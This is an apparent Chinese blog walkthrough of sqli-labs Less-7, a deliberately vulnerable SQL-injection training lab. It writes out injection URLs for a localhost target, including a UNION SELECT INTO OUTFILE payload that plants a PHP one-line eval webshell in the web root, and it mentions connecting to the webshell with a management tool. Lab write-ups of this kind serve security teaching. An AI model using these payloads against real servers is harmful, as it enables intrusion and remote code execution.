Sqli-labs less 7
Less-7
本关的标题是dump into outfile,意思是本关我们利用文件导入的方式进行注入。而在background-3中我们已经学习了如何利用dump into file.
这里首先还是回到源代码中去。重点放在对id参数的处理和sql语句上,从源代码中可以看到$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
这里对id参数进行了 '))的处理。所以我们其实可以尝试')) or 1=1--+进行注入
http://127.0.0.1/sqllib/Less-7/?id=1')) or 1=1--+
那我们这里利用上述提到的文件导入的方式进行演示:
http://127.0.0.1/sqllib/Less-7/?id=1'))UNION SELECT 1,2,3 into outfile "c:\\wamp\\www\\sqllib\\Less-7\\uuu.txt"%23
上图中显示sql出错了,但是没有关系,我们可以在文件中看到uuu.txt已经生成了。
像上述background-3中一样,我们可以直接将一句话木马导入进去。
http://127.0.0.1/sqllib/Less-7/?id=1'))UNION SELECT 1,2,'<?php @eval($_post["mima"])?>' into outfile "c:\\wamp\\www\\sqllib\\Less-7\\yijuhua.php"--+
我们可以在文件中看到一句话木马已经导入进去了
页面访问
此时用菜刀等webshell管理工具连接即可,这里不演示此过程了。
这里还有其他的内容可以导入,可以自己思考进行尝试。同时导入的方法上述在background中已经讲解过了,可以自行尝试。
最新文章
- 在js中添加新节点
- 50个新的汉化Demo!纯前端 Wijmo 放大招
- 编程:使用递归方式判断某个字串是否回文(Palindrome)
- Android ExpandableListView
- Python2.6下基于rsa的加密解密
- wget 下载整个网站,或者特定目录
- makefile学习小结
- ubuntu Nodejs和npm的安装
- 关于html中table表格tr,td的高度和宽度
- CorelDRAW中拆清除调和效果的技巧
- C++中string 的使用
- 这几天阅读的shadowgun的几个shader
- NOI2003 文本编辑器
- DAT文件怎样打开
- int与string转换
- cordova AndroidStudio3.0 升级报错问题
- 软件工程_10th weeks
- Angular features and services overview
- java中使用相对路径读取文件的写法总结 ,以及getResourceAsStream() (转)
- python写一个密码生成器的类,要求有个类变量,统计一下一共生成过多少个密码。 要求有4个方法,1:构造方法 2 实例方法 3 类方法 4 静态方法
热门文章
- [Luogu 3178] HAOI2013 树上操作
- 【BZOJ】1588: [HNOI2002]营业额统计
- JS之document例题讲解1(两张表之间数据转移、日期时间选择、子菜单下拉、用div做下拉菜单、事件总结)
- Microsoft Visual Studio TFS 切换登录用户的方法
- web-project 故障修复功能 传递所有的event_id数据到后台
- perl6文件操作
- Linux 入门记录:八、Linux 文件系统
- Linux内核死锁检测机制【转】
- 【LabVIEW技巧】LabVIEW中的错误1
- awk常见操作整理(更新)